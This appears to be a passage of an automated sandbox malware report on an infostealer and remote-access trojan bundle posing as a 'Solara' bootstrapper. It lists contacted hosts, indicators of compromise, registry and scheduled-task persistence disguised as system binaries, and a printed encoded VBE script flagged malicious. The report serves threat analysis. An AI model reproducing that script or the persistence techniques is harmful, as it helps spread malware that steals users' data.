https://github.githubassets.com/assets/keyboard-shortcuts-dialog-12eb51662ed7.js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/site-73c81d16a7dd.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServer	Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/favicons/favicon.svg	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	Built.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.di	Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz	Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/features/codespaces	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK	Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://github.comd	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wykop.pl/	Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitter.com/	Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.olx.pl/	Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
147.185.221.21	cash-spoken.gl.at.ply.gg	United States	12087	SALSGIVERUS	true
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
162.159.135.233	discordapp.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487977
Start date and time:	2024-08-05 14:31:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	98
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	Vjy8d2EoqK.exe renamed because original name is a hash value
Original Sample Name:	A0936899FBF31493BBE5E34DC18A9341.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.evad.winEXE@124/73@7/5
EGA Information:	Successful, ratio: 36.4%
HCA Information:	Successful, ratio: 53% Number of executed functions: 185 Number of non-executed functions: 226
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67
Excluded domains from analysis (whitelisted): a1009150.xsph.ru, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SolaraBootstrapper.exe, PID 7248 because it is empty
Execution Graph export aborted for target comReviewsession.exe, PID 7476 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 7324 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 8064 because it is empty
Execution Graph export aborted for target dwm.exe, PID 8060 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7848 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:32:06	API Interceptor	17x Sleep call for process: SolaraBootstrapper.exe modified
08:32:07	API Interceptor	3x Sleep call for process: WMIC.exe modified
08:32:08	API Interceptor	127x Sleep call for process: powershell.exe modified
08:32:45	API Interceptor	604800x Sleep call for process: XClient.exe modified
13:32:15	Task Scheduler	Run new task: dasHost path: "C:\Windows\SysWOW64\it-IT\dasHost.exe"
13:32:15	Task Scheduler	Run new task: dasHostd path: "C:\Windows\SysWOW64\it-IT\dasHost.exe"
13:32:15	Task Scheduler	Run new task: dwmd path: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
13:32:15	Task Scheduler	Run new task: iKSiRODBDWoPAMSDKBDQBFN path: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
13:32:16	Task Scheduler	Run new task: iKSiRODBDWoPAMSDKBDQBFNi path: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
13:32:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"
13:32:18	Task Scheduler	Run new task: cmd path: "C:\Windows\addins\cmd.exe"
13:32:18	Task Scheduler	Run new task: cmdc path: "C:\Windows\addins\cmd.exe"
13:32:19	Task Scheduler	Run new task: conhost path: "C:\Windows\apppatch\en-US\conhost.exe"
13:32:19	Task Scheduler	Run new task: conhostc path: "C:\Windows\apppatch\en-US\conhost.exe"
13:32:19	Task Scheduler	Run new task: dwm path: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
13:32:19	Task Scheduler	Run new task: powershell path: "C:\Recovery\powershell.exe"
13:32:19	Task Scheduler	Run new task: powershellp path: "C:\Recovery\powershell.exe"
13:32:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN "C:\Program Files (x86)\jdownloader\iKSiRODBDWoPAMSDKBDQBFN.exe"
13:32:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
13:32:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
13:32:43	Task Scheduler	Run new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
13:32:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\addins\cmd.exe"
13:32:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\apppatch\en-US\conhost.exe"
13:33:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
13:33:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"
13:33:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN "C:\Program Files (x86)\jdownloader\iKSiRODBDWoPAMSDKBDQBFN.exe"
13:33:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
13:33:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
13:33:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\addins\cmd.exe"
13:33:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\apppatch\en-US\conhost.exe"
13:34:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
13:34:12	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	3.bin.exe	Get hash	malicious	Go Injector	Browse	ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
	raw.ps1	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	NaOH.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	ip-api.com/line/?fields=hosting
	setup.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	ip-api.com/json/?fields=225545
147.185.221.21	setup.exe	Get hash	malicious	XWorm	Browse
	Inject.exe	Get hash	malicious	XWorm	Browse
	setup.exe	Get hash	malicious	AsyncRAT	Browse
	svchost23.exe	Get hash	malicious	AsyncRAT	Browse
	Nursultan Alpha (perm).exe	Get hash	malicious	XWorm	Browse
	ApVIkOzaxh.exe	Get hash	malicious	Njrat	Browse
	Nursultan Alpha Client.exe	Get hash	malicious	DCRat, XWorm	Browse
	Easy Anti-Cheat Analyzer.exe	Get hash	malicious	DCRat, XWorm	Browse
	6zYXga5dPH.exe	Get hash	malicious	Njrat	Browse
	qkLSlx42As.exe	Get hash	malicious	Njrat	Browse
185.199.108.133	http://rapbuki.sga.dom.my.id/aaa	Get hash	malicious	Unknown	Browse
	https://pancake-swap-live-rknx.vercel.app/	Get hash	malicious	Unknown	Browse
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	http://tok2np0ckht.top/	Get hash	malicious	HTMLPhisher	Browse
	Updated Handbook.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	SecuriteInfo.com.Trojan.WinGo.Ranumbot.18140.30614.exe	Get hash	malicious	Unknown	Browse
	https://profiles.secure-dashboard-ours.workers.dev/v3/help	Get hash	malicious	HTMLPhisher	Browse
	0d77da1e-ab68-7c71-dba6-5041121b78e5.eml	Get hash	malicious	Tycoon2FA	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discordapp.com	http://dc.tensgpt.com/branding/	Get hash	malicious	Unknown	Browse	162.159.129.233
	https://dc.tensgpt.com/	Get hash	malicious	Unknown	Browse	162.159.135.233
	http://rapbuki.sga.dom.my.id/aaa	Get hash	malicious	Unknown	Browse	162.159.133.233
	receipt-016.vbs	Get hash	malicious	Remcos, AsyncRAT, XWorm	Browse	162.159.133.233
	Estratto Conto.docm	Get hash	malicious	Unknown	Browse	162.159.129.233
	Estratto Conto.docm	Get hash	malicious	Unknown	Browse	162.159.134.233
	Estratto Conto.docm	Get hash	malicious	Unknown	Browse	162.159.135.233
	Built.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.233
	http://discord-proxy.tassadar2002.workers.dev/	Get hash	malicious	Unknown	Browse	162.159.129.233
	http://dapi.190823.xyz/	Get hash	malicious	Unknown	Browse	162.159.129.233
ip-api.com	3.bin.exe	Get hash	malicious	Go Injector	Browse	208.95.112.1
	raw.ps1	Get hash	malicious	Unknown	Browse	208.95.112.1
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	NaOH.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	208.95.112.1
github.com	551775-ZAM-6-6-2024.jar	Get hash	malicious	STRRAT	Browse	140.82.121.4
	PO-240722THP.jar	Get hash	malicious	STRRAT	Browse	140.82.121.4
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	140.82.121.4
	Updater.lnk	Get hash	malicious	Unknown	Browse	140.82.121.4
	DTC.hta	Get hash	malicious	Unknown	Browse	140.82.121.3
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	140.82.121.3
	http://rapbuki.sga.dom.my.id/aaa	Get hash	malicious	Unknown	Browse	140.82.121.3
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	140.82.121.4
	Setup.exe	Get hash	malicious	Vidar	Browse	140.82.121.4
	Updated Handbook.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	140.82.121.3
raw.githubusercontent.com	CV.vbs	Get hash	malicious	Xmrig	Browse	185.199.110.133
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	185.199.110.133
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	185.199.108.133
	Setup.exe	Get hash	malicious	Vidar	Browse	185.199.110.133
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	185.199.108.133
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	185.199.108.133
	SecuriteInfo.com.Trojan.WinGo.Ranumbot.18140.30614.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://profiles.secure-dashboard-ours.workers.dev/v3/help	Get hash	malicious	HTMLPhisher	Browse	185.199.108.133
	https://profiles.secure-dashboard-ours.workers.dev/v3/sitemap	Get hash	malicious	HTMLPhisher	Browse	185.199.109.133
	Loader v_1.27.exe	Get hash	malicious	LummaC	Browse	185.199.111.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	3.bin.exe	Get hash	malicious	Go Injector	Browse	208.95.112.1
	raw.ps1	Get hash	malicious	Unknown	Browse	208.95.112.1
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	NaOH.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	208.95.112.1
GITHUBUS	551775-ZAM-6-6-2024.jar	Get hash	malicious	STRRAT	Browse	140.82.121.4
	PO-240722THP.jar	Get hash	malicious	STRRAT	Browse	140.82.121.4
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	140.82.121.4
	Updater.lnk	Get hash	malicious	Unknown	Browse	140.82.121.4
	DTC.hta	Get hash	malicious	Unknown	Browse	140.82.121.3
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	140.82.121.4
	http://rapbuki.sga.dom.my.id/aaa	Get hash	malicious	Unknown	Browse	140.82.121.4
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	140.82.121.4
	Setup.exe	Get hash	malicious	Vidar	Browse	140.82.121.4
	http://tok2np0ckht.top/	Get hash	malicious	HTMLPhisher	Browse	140.82.121.6
SALSGIVERUS	FUDE.bin.exe	Get hash	malicious	XWorm	Browse	147.185.221.17
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	147.185.221.20
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	147.185.221.20
	system47.exe	Get hash	malicious	XWorm	Browse	147.185.221.18
	setup.exe	Get hash	malicious	XWorm	Browse	147.185.221.17
	setup.exe	Get hash	malicious	XWorm	Browse	147.185.221.21
	Inject.exe	Get hash	malicious	XWorm	Browse	147.185.221.21
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	147.185.221.20
	m427dF0Ztr.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	147.185.221.20
	6CDY0k02s7.exe	Get hash	malicious	AsyncRAT	Browse	147.185.221.19
FASTLYUS	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	151.101.2.132
	https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0	Get hash	malicious	Phisher	Browse	199.232.188.159
	https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3D	Get hash	malicious	Unknown	Browse	151.101.0.114
	View Invoice#98783859 Statement for dpo.lu.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://ib.adnxs.com/getuid?https%3a%2f%2famoudfoundation.com/ath80023211800id-4765445b-32c6-49b0-83e6-1d93765276ca#Gcharteip@daiichi-sankyo.fr	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	CV.vbs	Get hash	malicious	Xmrig	Browse	185.199.110.133
	file.html	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	receipt.ACH.No71124.html	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://forms.office.com/Pages/ResponsePage.aspx?id=mZB7T0Dtr0mx-Js9AsqUvjkKVGExcKpLpLje28x2_kZUOVA4UU9WT0pSQUFPSTZPUlhWTElINUNETy4u	Get hash	malicious	HTMLPhisher	Browse	151.101.130.110
	551775-ZAM-6-6-2024.jar	Get hash	malicious	STRRAT	Browse	199.232.192.209

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	doc_RFQ NEW ORDER #2400228341.pdf.exe	Get hash	malicious	AsyncRAT	Browse	185.199.108.133 140.82.121.4
	TVC4030004.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.108.133 140.82.121.4
	kFVFbXvmmW.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.133 140.82.121.4
	https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0	Get hash	malicious	Phisher	Browse	185.199.108.133 140.82.121.4
	Payment receipt.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.133 140.82.121.4
	https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.121.4
	009347280261.AWB.PEK.CO.227.20200508.240751.20200507.230805.22162.exe	Get hash	malicious	Snake Keylogger	Browse	185.199.108.133 140.82.121.4
	http://lmctgiveaway.com	Get hash	malicious	Unknown	Browse	185.199.108.133 140.82.121.4
	SOF Documents PDF.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 140.82.121.4
	DHL-66445735750-DHL-66445735750-DHL-66445735750.js	Get hash	malicious	Remcos	Browse	185.199.108.133 140.82.121.4

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with very long lines (701), with no line terminators
Category:	dropped
Size (bytes):	701
Entropy (8bit):	5.898668975829818
Encrypted:	false
SSDEEP:	12:qtkKNJiJpqolwLQKvelg6Recm8ZnQp3LTCv/GrcaR9AlGEbA7IgRLZdA:WtaJpqewcK2nReB6k7TCvOr//AMdO
MD5:	DAC81F843079367B451C5A5F4F247120
SHA1:	4EF901C26894F08C1E8FB874C22AFBBC233A4DF1
SHA-256:	2393FAE4A85C19250E87FE141C9E6FA67B0D227BFB23B0532CEF1942363EB7A1
SHA-512:	D821C72A86EEE34B388542771E6AC04253D49D41D87F2239EC4D9A551E6D765919CE7FECBE635BEDCEE54433709018C40CC5AC7C53D48F33128A9B2665054A0B
Malicious:	false
Preview:	Bgei07OqiUyoXbOVNHk8LVmG1Vbt6iY3FmizemRbqJ31c4eu78NAiogq4XqfgetA65iu2Z0l0JRBbuo70qv8VYUaG24H5v5LZ35hVu1iHmKYWeOKttpztvpikHnAftpENGlizGlGzN0sO5EmnuXLGGcoOW7NH1DY6FLQ3pUnIjAf56UoDAXvWe8Hn7UcJX87KcwIuyt7ZuDgG6sRCSKGeSCcHDm5V1eukCVdKL3PRZVmabBqODa0N2d2aTBrMxmhPT6DlPH0Z5yE6aBpC5rSbnhricD0KMDexxWHf7F85jbSDZ59RWpQFUFlvOeJMRqM2URID4JE0sW2MPnJhDiyhwYcsuVRd6wo2OZtIw6XMlaX7NZgkVmIs2pF6yaTi1k46s98z4BuHLl6VAfeVzrIUn5AiUxTWmyUAgbPNarpT1BhQtt5T58tKckSw9afHrXeWQ5zjPR4HBycmYtyk1AanEKh5IcNAMilegKAx4VDnEmJoIqYPl4Pq71SGY3awD45cM7FNtBqf6wjcA3xcE8YRS4gp23ZA4RjJqqbKlKgjOttKRzGfG8rFfoJRbZVzmplpMawTbn13bzCjKVYCx446jeoBgJtLzq7jIE81DwDcHyoqmkGFBSCrvoGswuxS4pDu1daGXg9B1byuz7Z6CnKhoQxd7PFS9uicu3zIKAreTA0T0V2yV0PQegGlp6IH

C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchosts.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	5.808697125492428
Encrypted:	false
SSDEEP:	6:GxWvwqK+NkLzWbHE08nZNDd3RL1wQJRd7JFx51a0gE7:GxFMCzWLE04d3XBJTJ3Tr
MD5:	9D6989EAC870B2CBC9B6E9E296095D92
SHA1:	0A0274A365E57FD557A6F41E283C83D72E9D4649
SHA-256:	514FA0DFD0C1E3522E5482D7D68FD1B0EE2FA66AA6B8286FD9D1815D6B9B0897
SHA-512:	59FAB44506F38C1E8EF0FEDA5DAB0F6C48D78F41BDB3C8DE32A511060FA852102A4639A9ACC97F684EC8CFEF5EA5E7BB6C359C05C899CDB6377BC97834725723
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.K3.DmMYJG;\F3Iw\.C`y5~K,dWEF1F;c4mYE~~TBPWl^d+EzoAAA==^#~@.

C:\Brokercrt\comReviewsession.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchosts.exe
